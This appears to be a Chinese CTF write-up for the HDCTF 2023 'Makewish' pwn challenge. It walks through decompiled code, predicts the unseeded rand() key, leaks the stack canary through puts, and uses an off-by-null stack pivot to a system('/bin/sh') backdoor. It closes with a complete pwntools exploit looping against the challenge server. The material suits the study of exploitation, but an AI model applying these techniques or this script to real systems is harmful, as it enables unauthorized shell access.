[HDCTF 2023]Makewish

栈迁移+Canary+随机数+栈随机循环

1775384368110-d8c37217-50c4-4780-b9c1-4a36d6117dfd.png

一道开启了 Canary 的 64 位栈题,先搜集信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
int __fastcall main(int argc, const char **argv, const char **envp)
{
    int buf_; // [rsp+8h] [rbp-38h] BYREF
    int buf__1; // [rsp+Ch] [rbp-34h]
    char buf[40]; // [rsp+10h] [rbp-30h] BYREF
    unsigned __int64 v7; // [rsp+38h] [rbp-8h]

    v7 = __readfsqword(0x28u);
    init(argc, argv, envp);
    buf__1 = rand() % 1000 + 324;
    puts("tell me you name\n");
    read(0, buf, 0x30u);
    puts("hello,");
    puts(buf);
    puts("tell me key\n");
    read(0, &buf_, 4u);
    if ( buf__1 == buf_ )
        return vuln();
    puts("failed");
    return 0;
}

我们可以填充 buf 大小为 0x30 的数据,恰好可以溢出 8 个字节,显然这个溢出长度太短以至于无法控制执行。

1
2
3
4
5
6
7
8
9
10
11
12
__int64 vuln()
{
    _BYTE buf[88]; // [rsp+0h] [rbp-60h] BYREF
    unsigned __int64 v2; // [rsp+58h] [rbp-8h]

    v2 = __readfsqword(0x28u);
    puts("welcome to HDctf,You can make a wish to me");
    buf[(int)read(0, buf, 0x60u)] = 0;
    // 这句话的意思是:在读入的数据最后置0作为截断
    puts("sorry,i can't do that");
    return 0;
}

vuln 函数当中我们同样最多覆盖到 Canary,不过他会在 buf 的末端加上一个字节的 \x00 相当于 Off-By-Null,通过这个,我们可以将 rbp 的最低位覆盖为 \x00。通过控制 rbp 我们就可以尝试栈迁移,问题是溢出长度不够。

细心发现,在 vuln 函数的末尾还有 leave_ret 的指令,这正好解决了溢出长度不够无法进行栈迁移的难题:

1775387041641-385de7b7-f6fb-48e2-b36f-fdcf3ddd6290.png 
1
2
3
4
int treasure()
{
    return system("/bin/sh");
}

由于只存在 Off-By-Null 而且无法泄露 rbp,所以我们没有办法去确定栈迁移的的地址。

我们只能在 vuln 的 buf 当中布置 ret 到后门的函数地址。抹去最后一个字节后让地址往低跳转,有几率会返回 buf 区域,也就是我们布满 system(‘/bin/sh’);

EXP 思路:

确定种子数

1
2
3
4
5
6
from ctypes import CDLL

libc = CDLL("libc.so.6")  # 加载 Linux 的 C 标准库
dynamic_key = libc.rand() % 1000 + 324

print(f"[+] The calculated key is: {dynamic_key} (Hex: {hex(dynamic_key)})")
1775388776398-c81f9d25-47b9-4c32-9345-72115a0c88ac.png

泄露 Canary

1775389208185-3a312206-9747-45c2-a22e-15bcecc559ee.png 
1
2
3
4
5
6
7
randnum=0x2c3
payload=b'a'*41
p.sendafter(b"name\n\n",payload)
p.recvuntil(b"hello,\n")
p.recv(40)
canary=u64(p.recv(8))&0xffffffffffffff00
log.info("canary: "+hex(canary))

这里直接输入 41 位字符串进行覆盖,防止 puts 被 Canary 的 \x00 截断,之后与运算还原低位。

1775389486570-2346e054-a96c-4a17-aab1-52d5f9b201ed.png

看一下 debug 接收的数据,发现了 Canary 在 0x41-0x48 的位置,所以先接收 40 个字节的数据再收 Canary。

种子数绕过

1
read(0, &buf_, 4u);

种子数绕过的前提是该 read 函数只读取了四个字节的数据,所以 p32 传参->

1
p.sendafter(b"key\n\n",p32(randnum))

在 buf 中填满 system(‘/bin/sh’)

1
2
3
4
payload=p64(elf.sym['treasure'])*11
payload=payload.ljust(88,b'\x00')
payload+=p64(canary)
p.sendafter(b"to me\n",payload)

持续接收获取 shell :总 EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
elf = ELF('./nss')
context(arch=elf.arch, os=elf.os, log_level = 'debug')
while True:
    # p = process('./nss')
    p = remote('node4.anna.nssctf.cn',21593)
    try:
        randnum=0x2c3
        payload=b'a'*41
        p.sendafter(b"name\n\n",payload)
        p.recvuntil(b"hello,\n")
        p.recv(40)
        canary=u64(p.recv(8)) & 0xffffffffffffff00
        log.info("canary: "+hex(canary))
        p.sendafter(b"key\n\n",p32(randnum))
        payload=p64(elf.sym['treasure'])*11
        payload=payload.ljust(88,b'\x00')
        payload+=p64(canary)
        p.sendafter(b"to me\n",payload)
        p.recvline()
        p.recvline(timeout=1)
        p.interactive()
    except KeyboardInterrupt:
        exit()
    except:
        p.close()
1775387997219-502e6f35-4a80-41e8-a700-43e6855f49ec.png

更新: 2026-04-06 16:07:20
原文: https://www.yuque.com/idcm/wnemg9/ucgmw6upsrbg4yom